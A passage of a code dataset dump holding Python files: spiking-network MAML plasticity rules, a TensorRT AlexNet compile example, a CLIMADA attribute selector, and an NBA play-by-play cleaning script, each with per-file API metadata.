dim=1))\n loss.backward(retain_graph=True)\n return S.grad\n\n\n\ndef loihi_soel(model,\n inputs,\n target,\n params=None,\n step_size=.01,\n first_order=False,\n learning_engine=None):\n \n \"\"\"\n Update last layer with SOEL using Loihi Plasticity\n \n Parameters\n ----------\n model : `torchmeta.modules.MetaModule` instance\n The model.\n \n logits: torch.tensor() float or int\n The model output, can be sum of spikes, I've had most succes with that on non-meta\n but voltage should be able to work to because the plasticity trys to spike like the \n loihi would and I would use those spikes but the spikes are based on the output so\n may need to experiment to see what is best\n \n target: torch.tensor() int\n Tensor containing the 
integer value of the target classe.\n This indicates which neuron should be learning when.\n Basically, zero grad non-target neurons\n \n params : `collections.OrderedDict` instance, optional\n Dictionary containing the meta-parameters of the model. If `None`, then\n the values stored in `model.meta_named_parameters()` are used. This is\n useful for running multiple steps of gradient descent as the inner-loop.\n\n step_size : int, `torch.Tensor`, or `collections.OrderedDict` instance (default: 0.5)\n The step size in the gradient update. If an `OrderedDict`, then the\n keys must match the keys in `params`.\n\n first_order : bool (default: `False`)\n If `True`, then the first order approximation of MAML is used.\n \n learning_engine: LoihiPlasticity\n Implements the learning rule using a model for loihi's plasticity processor\n\n Returns\n -------\n updated_params : `collections.OrderedDict` instance\n Dictionary containing the updated meta-parameters of the model, with one\n gradient update wrt. the SOEL Loihi Plasticity learning rule weight updates\n \"\"\"\n \n # can only process one sample at a time? I guess so with how traces work\n # maybe if I combine with sgd I can train whole nets with it?\n \n if params is None:\n params = OrderedDict(model.meta_named_parameters())\n \n \n #soel_grads = torch.zeros((model.blocks[-1].synapse.weight.shape[0], model.blocks[-1].synapse.weight.shape[1])).unsqueeze(-1).unsqueeze(-1).unsqueeze(-1)\n \n #pdb.set_trace()\n \n \n for inp in range(target.shape[0]):\n with torch.no_grad(): # assuming only inner loop needed here (won't work in outer loop)\n logits = model(inputs[inp].unsqueeze(0), params=params)\n thresh = 0\n for i in range(5): # this should simulate tEpoch=20 I think???? only works if time is 100, I've been using 100 but not flexible\n #pdb.set_trace()\n err = 10 - torch.sum(learning_engine.y[0][0][target[inp]].T[20*i:20*(i+1)].T,axis=-1)\n #pdb.set_trace()\n if err!=0 and ((err>thresh) or (err < -thresh)):\n learning_engine.y[1][0][target[inp]][20*(i+1)-1] = 20+err if (20+err)>=0 else 0\n\n thresh+=1 \n else:\n if thresh > 0:\n thresh-=1 \n \n #pdb.set_trace()\n learning_engine.apply() # applies the learning to update the weights based on grad values (traces)\n \n \n #pdb.set_trace()\n updated_params = OrderedDict()\n \n names = [name for name, param in params.items()]\n for name, param in params.items():\n #pdb.set_trace()\n if name != names[-1]: \n updated_params[name] = param# - step_size * grad\n else:\n #pdb.set_trace()\n updated_params[name] = param + step_size * model.blocks[-1].synapse.weight.grad\n \n #pdb.set_trace()\n print(f\"grads {model.blocks[-1].synapse.weight.grad.squeeze()}\")\n print(f\"loihi quantized before: {model.blocks[-1].synapse.pre_hook_fx(params[name],descale=True).squeeze()}\")\n print(f\"loihi quantized after: {model.blocks[-1].synapse.pre_hook_fx(updated_params[name],descale=True).squeeze()}\")\n #pdb.set_trace()\n return updated_params\n\n\ndef maml_soel(model,\n U,\n targets,\n params=None,\n step_size=0.5,\n first_order=False,\n threshold = None):\n \"\"\"Update last layer with SOEL algorithm from Stewart et.al 2020 JETCAS\n Parameters\n ----------\n model : `torchmeta.modules.MetaModule` instance\n The model.\n\n loss : `torch.Tensor` instance\n The value of the inner-loss. This is the result of the training dataset\n through the loss function.\n\n params : `collections.OrderedDict` instance, optional\n Dictionary containing the meta-parameters of the model. 
If `None`, then\n the values stored in `model.meta_named_parameters()` are used. This is\n useful for running multiple steps of gradient descent as the inner-loop.\n\n step_size : int, `torch.Tensor`, or `collections.OrderedDict` instance (default: 0.5)\n The step size in the gradient update. If an `OrderedDict`, then the\n keys must match the keys in `params`.\n\n first_order : bool (default: `False`)\n If `True`, then the first order approximation of MAML is used.\n\n threshold : torch.Tensor, either 1 dim or dim compatible with last layer output. (default: torch.Tensor([.05], requires_grad=False)\n\n Returns\n -------\n updated_params : `collections.OrderedDict` instance\n Dictionary containing the updated meta-parameters of the model, with one\n gradient update wrt. the inner-loss.\n \n \"\"\"\n \n if not isinstance(model, MetaModule):\n raise ValueError('The model must be an instance of `torchmeta.modules.'\n 'MetaModule`, got `{0}`'.format(type(model)))\n\n if params is None:\n params = OrderedDict(model.meta_named_parameters())\n \n pdb.set_trace()\n \n S = fast_sigmoid(U)\n \n #dLdU = cross_entropy_gradient(U,targets)\n \n dLdS = cross_entropy_gradient(S,targets)\n dLdS.requires_grad = True\n \n #dLdU.requires_grad = True\n #dSdU = torch.autograd.grad(S,U,dLdS,retain_graph=True)#S.backward(U, retain_graph=True)\n if threshold is None:\n threshold = torch.Tensor([.05], requires_gradient=False).to(model.get_input_layer_device())\n triggered = error_trigger(dLdS, threshold)\n \n # USE THIS FOR DEBUGGING\n #print('Error Rate',torch.sum(triggered!=0)/torch.prod(torch.Tensor(tuple(triggered.size()))))\n \n ## Update last layer only (as in SOEL paper )\n if hasattr(model, 'LIF_layers'):\n param_name_weight = 'LIF_layers.{0}.base_layer.weight'.format(len(model.LIF_layers)-1)\n param_name_bias = None #'LIF_layers.{0}.base_layer.bias'.format(len(model.LIF_layers)-1)\n \n dUdW = torch.autograd.grad(U,params[param_name_weight],grad_outputs=triggered,retain_graph=True) \n if param_name_bias is not None:\n dUdb = torch.autograd.grad(U,params[param_name_bias],grad_outputs=triggered,retain_graph=True) \n \n elif hasattr(model, 'blocks'):\n mhid = \"Mhid\"\n param_name_weight = f'blocks.{len(model.network_params[mhid])}.synapse.weight'\n param_name_bias = None\n \n dUdW = torch.autograd.grad(U,params[param_name_weight],grad_outputs=triggered,retain_graph=True) \n #dUdb = torch.autograd.grad(U,params[param_name_bias],grad_outputs=triggered,retain_graph=True) \n \n #pdb.set_trace()\n \n updated_params = OrderedDict()\n \n for name, param in params.items():\n if name == param_name_weight:\n updated_params[name] = param - step_size * dUdW[0]\n elif name == param_name_bias:\n updated_params[param_name_bias] = param - step_size * dUdb[0]\n else: \n updated_params[name] = param\n\n\n\n\n \n return updated_params\n\n\n \ndef custom_sgd(model,\n loss,\n params=None,\n step_size=0.5,\n first_order=False,\n custom_update_fn = None):\n \"\"\"Update of the meta-parameters with one step of gradient descent on the\n loss function.\n\n Parameters\n ----------\n model : `torchmeta.modules.MetaModule` instance\n The model.\n\n loss : `torch.Tensor` instance\n The value of the inner-loss. This is the result of the training dataset\n through the loss function.\n\n params : `collections.OrderedDict` instance, optional\n Dictionary containing the meta-parameters of the model. If `None`, then\n the values stored in `model.meta_named_parameters()` are used. 
This is\n useful for running multiple steps of gradient descent as the inner-loop.\n\n step_size : int, `torch.Tensor`, or `collections.OrderedDict` instance (default: 0.5)\n The step size in the gradient update. If an `OrderedDict`, then the\n keys must match the keys in `params`.\n\n first_order : bool (default: `False`)\n If `True`, then the first order approximation of MAML is used.\n\n Returns\n -------\n updated_params : `collections.OrderedDict` instance\n Dictionary containing the updated meta-parameters of the model, with one\n gradient update wrt. the inner-loss.\n \"\"\"\n if not isinstance(model, MetaModule):\n raise ValueError('The model must be an instance of `torchmeta.modules.'\n 'MetaModule`, got `{0}`'.format(type(model)))\n\n if params is None:\n #print(\"params is None\")\n params = OrderedDict(model.meta_named_parameters())\n print(\"params\", params.keys())\n # else:\n # print(\"params is not None\")\n\n\n grads = torch.autograd.grad(loss,\n params.values(),\n create_graph=not first_order,\n allow_unused=True)\n \n #grad_flow('./',grads)\n \n #pdb.set_trace()\n \n# torch.save(grads,\"saved_inputs_and_grads/grads.pt\")\n \n# i=1/0\n \n updated_params = OrderedDict()\n\n if isinstance(step_size, (dict, OrderedDict)):\n for (name, param), grad in zip(params.items(), grads):\n if grad is not None:\n if custom_update_fn is not None and 'weight' in name:\n deltaw = custom_update_fn(grad, params[name].data, eta=step_size[name])\n updated_params[name] = param - deltaw #ws - w - ws\n else:\n updated_params[name] = param - step_size[name] * grad\n\n else:\n for (name, param), grad in zip(params.items(), grads):\n if grad is not None:\n # print(f\"{name} grad is\")\n # print(grad.shape)\n # print(grad)\n # pdb.set_trace()\n if custom_update_fn is not None and 'weight' in name:\n w = custom_update_fn(grad, param, eta=step_size)\n updated_params[name] = w\n else:\n # if grad.any()!=0:\n # print('updating')\n # pdb.set_trace()\n updated_params[name] = param - step_size * grad\n \n\n return updated_params\n\ndef custom_sgd_reg(model, loss, params=None, step_size=0.5, anchor_params=None, lamda=1.0):\n \"\"\"Update of the meta-parameters with one step of gradient descent on the\n loss function.\n \"\"\"\n if not isinstance(model, MetaModule):\n raise ValueError('The model must be an instance of `torchmeta.modules.'\n 'MetaModule`, got `{0}`'.format(type(model)))\n\n if params is None:\n params = OrderedDict(model.meta_named_parameters())\n\n anchor_params = OrderedDict(anchor_params)\n\n grads = torch.autograd.grad(loss,\n params.values(),\n create_graph=True,\n allow_unused=True)\n \n updated_params = OrderedDict()\n\n for (name, param), grad in zip(params.items(), grads):\n if isinstance(step_size, (dict, OrderedDict)):\n ss = step_size[name]\n else:\n ss = step_size\n\n # Should this not be the difference between param and anchor_value? 
Note the negative sign inside the bracket\n        updated_params[name] = param - ss * lamda * (param - anchor_params[name])\n        # updated_params[name] = (1 - lamda * ss) * param - lamda * ss * anchor_params[name]\n\n        if grad is not None:\n            updated_params[name] = param - ss * grad\n\n    return updated_params, grads\n\n", "repo_name": "nmi-lab/snn_maml", "sub_path": "snn_maml/plasticity_rules.py", "file_name": "plasticity_rules.py", "file_ext": "py", "file_size_in_byte": 15665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.autograd", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.abs", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.norm", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.numel", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogy", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 91, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 164, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 179, "usage_type": "call"}, {"api_name": "torchmeta.modules.MetaModule", "line_number": 237, "usage_type": "argument"}, {"api_name": "collections.OrderedDict", "line_number": 242, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.autograd.grad", "line_number": 267, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 267, "usage_type": "attribute"}, {"api_name": "torch.autograd.grad", "line_number": 269, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 269, "usage_type": "attribute"}, {"api_name": "torch.autograd.grad", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 276, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 281, "usage_type": "call"}, {"api_name": "torchmeta.modules.MetaModule", "line_number": 335, "usage_type": "argument"}, {"api_name": "collections.OrderedDict", "line_number": 341, "usage_type": "call"}, {"api_name": "torch.autograd.grad", "line_number": 347, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 347, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 360, 
"usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 362, "usage_type": "name"}, {"api_name": "torchmeta.modules.MetaModule", "line_number": 394, "usage_type": "argument"}, {"api_name": "collections.OrderedDict", "line_number": 399, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 401, "usage_type": "call"}, {"api_name": "torch.autograd.grad", "line_number": 403, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 403, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 408, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 411, "usage_type": "name"}]} +{"seq_id": "10224451552", "text": "import tensorrt as trt\nimport pycuda.driver as cuda\nimport pycuda.autoinit\nimport numpy as np\nfrom torchvision.models.alexnet import alexnet\nfrom torch import nn\n\nACTIVATIONS = {\n nn.ReLU: trt.infer.ActivationType.RELU,\n nn.Sigmoid: trt.infer.ActivationType.SIGMOID,\n nn.Tanh: trt.infer.ActivationType.TANH\n }\n\nPOOLINGS = {\n nn.MaxPool2d: trt.infer.PoolingType.MAX,\n nn.AvgPool2d: trt.infer.PoolingType.AVERAGE\n}\n\n\ntensor_type = trt.infer.Tensor\n\n\ndef as_tuple(x):\n return x if isinstance(x, tuple) else (x, x)\n\n\ndef __convolution__(network, prev_layer, layer):\n num_output = layer.out_channels\n state = layer.state_dict()\n W = state['weight'].numpy().flatten()\n b = state['bias'].numpy().flatten() if 'bias' in state else np.zeros(num_output)\n conv = network.add_convolution(\n prev_layer.get_output(0) if not isinstance(prev_layer, tensor_type) else prev_layer,\n num_output, layer.kernel_size, W, b)\n assert conv\n conv.set_stride(layer.stride)\n conv.set_dilation(trt.infer.DimsHW(layer.dilation))\n conv.set_padding(layer.padding)\n return conv#.get_output(0)\n\n\ndef __activation__(network, prev_layer, layer):\n act = network.add_activation(\n prev_layer.get_output(0) if not isinstance(prev_layer, tensor_type) else prev_layer,\n ACTIVATIONS[type(layer)])\n assert act\n return act\n\n\ndef __pooling__(network, prev_layer, layer):\n k = as_tuple(layer.kernel_size)\n s = as_tuple(layer.stride)\n pool = network.add_pooling(\n prev_layer.get_output(0) if not isinstance(prev_layer, tensor_type) else prev_layer,\n POOLINGS[type(layer)], trt.infer.DimsHW(k))\n assert pool\n pool.set_stride(trt.infer.DimsHW(s))\n return pool\n\n\ndef __linear__(network, prev_layer, layer):\n num_output = layer.out_features\n state = layer.state_dict()\n W = state['weight'].numpy().flatten()\n b = state['bias'].numpy().flatten() if 'bias' in state else np.zeros(num_output)\n lin = network.add_fully_connected(\n prev_layer.get_output(0) if not isinstance(prev_layer, tensor_type) else prev_layer,\n num_output, W, b)\n assert lin\n return lin\n\ndef __sequential__(network, prev_layer, layer):\n net = prev_layer\n for _layer in layer.children():\n _type = type(_layer)\n if _type in mapping:\n net = mapping[_type](network, net, _layer)\n return net\n\nmapping = {\n nn.Sequential: __sequential__,\n\n nn.Conv2d: __convolution__,\n\n nn.Linear: __linear__,\n\n nn.ReLU: __activation__,\n nn.Tanh: __activation__,\n nn.Sigmoid: __activation__,\n\n nn.AvgPool2d: __pooling__,\n nn.MaxPool2d: __pooling__\n }\n\nmodel = alexnet(pretrained=True)\nlayers = []\nfor c in model.features.children():\n layers.append(c)\nfor c in model.classifier.children():\n layers.append(c)\n\nG_LOGGER = trt.infer.ConsoleLogger(trt.infer.LogSeverity.ERROR)\nbuilder = trt.infer.create_infer_builder(G_LOGGER)\n\nnetwork = 
builder.create_network()\n\n\n\nnet = network.add_input(\"data\", trt.infer.DataType.FLOAT, (3, 224, 224))\n\n# for module in model.children():\n#     _type = type(module)\n#     net = mapping[_type](network, net, module)\n\nnet = __convolution__(network, net, layers[0])\nnet = __activation__(network, net.get_output(0), layers[1])\nnet = __pooling__(network, net.get_output(0), layers[2])\nnet = __convolution__(network, net.get_output(0), layers[3])\nnet = __activation__(network, net.get_output(0), layers[4])\nnet = __pooling__(network, net.get_output(0), layers[5])\nnet = __convolution__(network, net.get_output(0), layers[6])\nnet = __activation__(network, net.get_output(0), layers[7])\nnet = __convolution__(network, net.get_output(0), layers[8])\nnet = __activation__(network, net.get_output(0), layers[9])\nnet = __convolution__(network, net.get_output(0), layers[10])\nnet = __activation__(network, net.get_output(0), layers[11])\nnet = __pooling__(network, net.get_output(0), layers[12])\nnet = __linear__(network, net.get_output(0), layers[14])\nnet = __activation__(network, net.get_output(0), layers[15])\nnet = __linear__(network, net.get_output(0), layers[17])\nnet = __activation__(network, net.get_output(0), layers[18])\nnet = __linear__(network, net.get_output(0), layers[19])\n\nnetwork.mark_output(net.get_output(0))\n\nbuilder.set_max_batch_size(1)\nbuilder.set_max_workspace_size(1 << 20)\n\nengine = builder.build_cuda_engine(network)\nnetwork.destroy()\nbuilder.destroy()\n\nruntime = trt.infer.create_infer_runtime(G_LOGGER)\nimg = np.random.randn(3, 224, 224)\nimg = img.ravel()\n\ncontext = engine.create_execution_context()\n\noutput = np.empty(1000, dtype=np.float32)\n\n# allocate device memory\nd_input = cuda.mem_alloc(1 * img.size * img.dtype.itemsize)\nd_output = cuda.mem_alloc(1 * output.size * output.dtype.itemsize)\n\nbindings = [int(d_input), int(d_output)]\n\nstream = cuda.Stream()\n# transfer input data to device\ncuda.memcpy_htod_async(d_input, img, stream)\n# execute model\ncontext.enqueue(1, bindings, stream.handle, None)\n# transfer predictions back\ncuda.memcpy_dtoh_async(output, d_output, stream)\n\nstream.synchronize()\nprint(\"Prediction: \" + str(np.argmax(output)))\n", "repo_name": "Lextal/inference-exercise", "sub_path": "examples/alexnet_compiling.py", "file_name": "alexnet_compiling.py", "file_ext": "py", "file_size_in_byte": 5191, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.nn.ReLU", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "tensorrt.infer", "line_number": 9, "usage_type": "attribute"}, {"api_name": "tensorrt.infer", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorrt.infer", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "tensorrt.infer", "line_number": 15, "usage_type": "attribute"}, 
{"api_name": "tensorrt.infer", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorrt.infer", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorrt.infer.DimsHW", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorrt.infer", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorrt.infer.DimsHW", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorrt.infer", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorrt.infer.DimsHW", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorrt.infer", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 81, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 85, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 87, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 87, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 88, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 91, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 92, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torchvision.models.alexnet.alexnet", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorrt.infer.ConsoleLogger", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorrt.infer", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tensorrt.infer.create_infer_builder", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorrt.infer", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tensorrt.infer", "line_number": 109, "usage_type": "attribute"}, {"api_name": "tensorrt.infer.create_infer_runtime", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorrt.infer", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 149, "usage_type": "attribute"}, {"api_name": "pycuda.driver.mem_alloc", "line_number": 152, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 152, "usage_type": "name"}, {"api_name": "pycuda.driver.mem_alloc", "line_number": 153, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 153, "usage_type": "name"}, {"api_name": "pycuda.driver.Stream", "line_number": 157, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 157, "usage_type": "name"}, {"api_name": "pycuda.driver.memcpy_htod_async", "line_number": 159, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 159, 
"usage_type": "name"}, {"api_name": "pycuda.driver.memcpy_dtoh_async", "line_number": 163, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 163, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 166, "usage_type": "call"}]} +{"seq_id": "32710949986", "text": "import logging\nimport numpy as np\n\nLOGGER = logging.getLogger(__name__)\n\ndef get_attributes_with_matching_dimension(obj, dims):\n \"\"\"\n Get the attributes of an object that have len(dims) number\n of dimensions or more, and all dims are individual parts of the\n attribute's shape.\n\n\n Parameters\n ----------\n obj : object of any class\n The object from which matching attributes are returned\n dims : list[int]\n List of dimensions size to match\n\n Returns\n -------\n list_of_attrs : list[str]\n List of names of the attributes with matching dimensions\n \"\"\"\n\n list_of_attrs = []\n for attr, value in obj.__dict__.items():\n\n if isinstance(value, list):\n try:\n value = np.array(value)\n except ValueError as verr:\n if \"inhomogenous shape\" in str(verr):\n continue\n\n try:\n if all([dims.count(i) <= value.shape.count(i) for i in set(dims)]):\n list_of_attrs.append(attr)\n except AttributeError:\n continue\n\n return list_of_attrs\n", "repo_name": "CLIMADA-project/climada_python", "sub_path": "climada/util/select.py", "file_name": "select.py", "file_ext": "py", "file_size_in_byte": 1105, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 248, "dataset": "github-code", "pt": "46", "api": [{"api_name": "logging.getLogger", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "24450801774", "text": "import re\nimport datetime\nimport time\nimport json\nimport find_player\nimport logging\nimport player\n\nfrom libscrape.config import config\nfrom libscrape.config import db\nfrom libscrape.config import constants \n\n\nLOGDIR_CLEAN = constants.LOGDIR_CLEAN\nLOGDIR_EXTRACT = constants.LOGDIR_EXTRACT\nLOGDIR_SOURCE = constants.LOGDIR_SOURCE\n\n\nclass Clean:\n\n def __init__(self, filename, gamedata, dbobj):\n self.raw_data = open(LOGDIR_EXTRACT + filename,'r').read()\n self.dbobj = dbobj\n self.game = gamedata\n self.filename = filename\n\n self.home_players = self._getPlayersInGame(self.game['home_team_id'])\n self.away_players = self._getPlayersInGame(self.game['away_team_id'])\n\n\n def clean(self):\n plays = self._parse()\n plays = self._resolveTeam(plays)\n plays = self._resolveScore(plays)\n plays = self._resolveDescription(plays)\n plays = self._resolveDecisecondsLeft(plays)\n plays = self._renameFields(plays)\n plays = self._resolvePlays(plays)\n plays = self._addGameId(plays)\n plays = self._deleteFields(plays)\n\n self._dumpFile(plays)\n\n\n def _parse(self):\n plays = []\n\n data = json.loads(self.raw_data)\n for line in data['resultSets']:\n if 'name' in line.keys() and line['name'] == 'PlayByPlay':\n for event in line['rowSet']:\n plays.append(dict(zip([header.lower() for header in line['headers']],event)))\n\n return plays\n\n\n def _resolveTeam(self, plays):\n data = []\n for play in plays:\n if play['homedescription']:\n play['team_id'] = self.game['home_team_id']\n elif play['visitordescription']:\n play['team_id'] = self.game['away_team_id']\n else:\n play['team_id'] = 0\n\n data.append(play)\n\n return data\n\n\n def _resolveScore(self, plays):\n data = []\n home_score = 0\n away_score = 0\n for play in plays:\n if play['score']:\n play['home_score'], play['away_score'] = 
play['score'].split(' - ')\n home_score = play['home_score']\n away_score = play['away_score']\n else:\n play['home_score'] = home_score\n play['away_score'] = away_score\n\n data.append(play)\n\n return data\n\n\n def _addGameId(self, plays):\n data = []\n for play in plays:\n play['game_id'] = self.game['id']\n data.append(play)\n\n return data\n\n\n def _resolveDescription(self, plays):\n data = []\n for play in plays:\n if play['homedescription']:\n play['description'] = play['homedescription'].strip()\n elif play['visitordescription']:\n play['description'] = play['visitordescription'].strip()\n else:\n play['description'] = play['neutraldescription'].strip()\n\n data.append(play)\n\n return data\n\n\n def _resolveDecisecondsLeft(self, plays):\n data = []\n for play in plays:\n time_left = play['pctimestring'].split(':') \n play['deciseconds_left'] = (int(time_left[0]) * 60 + int(time_left[1])) * 10\n data.append(play)\n\n return data\n\n\n def _renameFields(self, plays):\n data = []\n for play in plays:\n play['game_event_id'] = play['eventnum']\n data.append(play)\n\n return data\n\n\n def _resolvePlays(self, plays):\n data = []\n patterns = self.dbobj.query_dict(\"SELECT id, re FROM play_type_statsnbacom ORDER BY priority ASC\")\n resolveobj = player.Resolve(self.dbobj)\n\n\n for play in plays:\n play['play_type_statsnbacom_id'] = 0\n \n for pattern in patterns:\n match = re.match(pattern['re'], play['description'])\n if match:\n matched_attributes = match.groupdict()\n if 'player_id' in matched_attributes.keys():\n player_id = 0\n # Try last name first, then full name second\n if play['team_id'] == self.game['home_team_id']:\n player_list_last_name = [(line['id'], line['last_name']) for line in self.home_players]\n player_list_full_name = [(line['id'], line['full_name']) for line in self.home_players]\n elif play['team_id'] == self.game['away_team_id']: \n player_list_last_name = [(line['id'], line['last_name']) for line in self.away_players]\n player_list_full_name = [(line['id'], line['full_name']) for line in self.away_players]\n\n player_match = resolveobj.matchByNameApproximate(matched_attributes['player_id'], player_list_last_name)\n if player_match:\n player_id = player_match\n else:\n player_match = resolveobj.matchByNameApproximate(matched_attributes['player_id'], player_list_full_name)\n if player_match:\n player_id = player_match\n\n play['player_id'] = player_id\n\n\n play['play_type_statsnbacom_id'] = pattern['id']\n #print (play['play_type_statsnbacom_id'], play['description'], match.groupdict())\n break\n\n data.append(play)\n\n return data\n\n\n def _deleteFields(self, plays):\n data = []\n for play in plays:\n del play['eventnum']\n del play['score']\n del play['scoremargin']\n data.append(play)\n\n return data\n\n\n def _getPlayersInGame(self, team_id):\n return self.dbobj.query_dict(\"\"\"\n SELECT p.id, p.full_name, p.last_name\n FROM player_statsnbacom ps\n INNER JOIN player p ON p.id = ps.player_id\n WHERE ps.game_id = %s AND ps.team_id = %s\n \"\"\" % (self.game['id'], team_id))\n\n\n def _dumpFile(self, plays):\n f = open(LOGDIR_CLEAN + self.filename,'w')\n play_json = json.dumps(plays)\n f.write(play_json)\n\n\ndef main():\n\n dbobj = db.Db(config.dbconn_prod_nba)\n\n game = dbobj.query_dict(\"SELECT * FROM game WHERE id = %s\" % (4371))[0]\n filename = '%s_playbyplay_statsnbacom' % (game['abbrev'])\n obj = Clean(filename, game, dbobj)\n obj.clean()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "kpascual/nbascrape", "sub_path": 
"libscrape/clean/playbyplay_statsnbacom.py", "file_name": "playbyplay_statsnbacom.py", "file_ext": "py", "file_size_in_byte": 6597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 58, "dataset": "github-code", "pt": "41", "api": [{"api_name": "libscrape.config.constants.LOGDIR_CLEAN", "line_number": 14, "usage_type": "attribute"}, {"api_name": "libscrape.config.constants", "line_number": 14, "usage_type": "name"}, {"api_name": "libscrape.config.constants.LOGDIR_EXTRACT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "libscrape.config.constants", "line_number": 15, "usage_type": "name"}, {"api_name": "libscrape.config.constants.LOGDIR_SOURCE", "line_number": 16, "usage_type": "attribute"}, {"api_name": "libscrape.config.constants", "line_number": 16, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 48, "usage_type": "call"}, {"api_name": "player.Resolve", "line_number": 136, "usage_type": "call"}, {"api_name": "re.match", "line_number": 143, "usage_type": "call"}, 